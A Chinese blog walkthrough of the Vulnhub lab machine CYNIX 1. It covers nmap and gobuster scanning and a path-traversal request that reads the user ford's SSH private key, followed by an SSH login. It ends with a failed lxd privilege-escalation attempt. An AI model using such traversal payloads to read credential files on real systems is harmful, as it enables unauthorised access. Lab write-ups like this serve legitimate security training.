Vulnhub靶机实战-CYNIX 1

最新推荐文章于 2024-04-14 01:04:27 发布
最新推荐文章于 2024-04-14 01:04:27 发布
阅读量521 收藏 1
点赞数 1
分类专栏: 靶场 文章标签: vulnhub 渗透测试 靶机实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/112778397
版权

声明

好好学习,天天向上

搭建

官方建议virtual打开,我这里都调成桥接

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A

在这里插入图片描述

开启端口

发现开启80,6688

访问80

http://192.168.31.121

目录扫描

gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x .php,.txt,.html,.zip

在这里插入图片描述

访问一下这个/lavalamp

http://192.168.31.121/lavalamp

在最下面发现contact us可以用,提交数据看看

在这里插入图片描述

发现其像另一个php提交这些表单内容

在这里插入图片描述

访问,在向我们挑衅, 让我们绕过他

http://192.168.31.121/lavalamp/canyoubypassme.php

在这里插入图片描述

查看页面源代码发现一个table被设置成透明隐藏了

在这里插入图片描述

把这个值调成1.0,输入一个数字,然后下载这个数字,任意文件下载?猜测就是文件包含吧

在这里插入图片描述

抓包康康吧,访问passwd失败

在这里插入图片描述

但是在最前面随便加上一个内容就成功了

在这里插入图片描述

想办法搞定ford这个用户

在/home/ford/.ssh/找到了公钥、私钥,并将私钥保存到本地

file=/vulnhub/../../../../../../../home/ford/.ssh/id_rsa&read=Download+the+number

在这里插入图片描述

复制私钥到kali

在这里插入图片描述

调整权限并ssh登录

chmod 0600 ./id_rsa
ssh -p 6688 ford@192.168.31.121 -i id_rsa

在这里插入图片描述

拿到flag

在这里插入图片描述

使用id命令显示用户的UID以及所属组的GID,可以看到当前用户ford所属组中还有一个特殊的lxd组,这个是提权的关键点

当然也有sh脚本可以扫描

在这里插入图片描述

在kali上生成镜像

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

完成上面操作之后会在当前目录下生成一个tar.gz镜像文件

然并卵,以失败告终,各种报错导致没办法生成tar.gz,后面再研究研究把,耻辱了

维梓-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机 CyNix
qq_52178795的博客
06-20 159
此篇文章重点在于lxd提权运用
Vulnhub-Cynix
wwxxss
07-05 161
我们查看这些目录中是否有我们需要的信息,手动实验后并没有收获任何信息,那我们只能从lavalamp中寻找利用点。但是在查看passwd文件时并没有反应,猜测有过滤,在这里提示我们使用数字,我们在其前面加一个数字看看。寻找一个网站:http://192.168.35.240/lavalamp。使用抓包软件抓取发现有点类似于文件包含,因此我们首先尝试能不能远程文件包含。在网站中找到一个留言框,那我们尝试对其进行留言抓包。读取ford用户的ssh私钥,我们进行保存登录。进去后没有什么信息,继续对其网站目录扫描。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1),2024互联网大厂网络安全面经合集
最新发布
2301_77116622的博客
04-14 874
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
Vulnhub靶机CYNIX_ 1
LainWith的博客
01-15 1749
目录介绍信息收集主机发现主机信息探测网站探测目录扫描网站测试读取SSH私钥SSH连接靶机第一个Flag提权lxd提权第二个Flag参考 介绍 难度:中等 靶机发布日期:2019年11月27日 Flag两个:User flag: user.txt;Root flag: root.txt 靶机地址:https://www.vulnhub.com/entry/cynix-1,394/ ​ 学习:LXD提权 信息收集 主机发现 netdiscover主机发现 额,,无法通过主机名区分开哪个才是靶机。 sudo ne
VulnHub系列』CyNix: 1-Walkthrough
ins1ght的博客
01-12 844
这是我完成的VulnHub上的第31个靶机靶机发布日期:2019年11月27日。难度:中等。标签:SSH密钥登录、文件读取、ByPass、lxd提权。
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1131
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 1788
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1224
test。
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8415
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
Aluxian_的博客
06-23 1104
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度比较简单1.信息收集获取ip地址 和端口信息web等 查看F12源码信息‘2.enum4linux工具得使用(新知识点)用于账号枚举Brainfuck编码(经常做ctf得肯定知道)3.nc bash反弹命令(经常做渗透得话这一条肯定要背下来得,不然每次看命令没有提升。
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1167
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1172
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2824
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值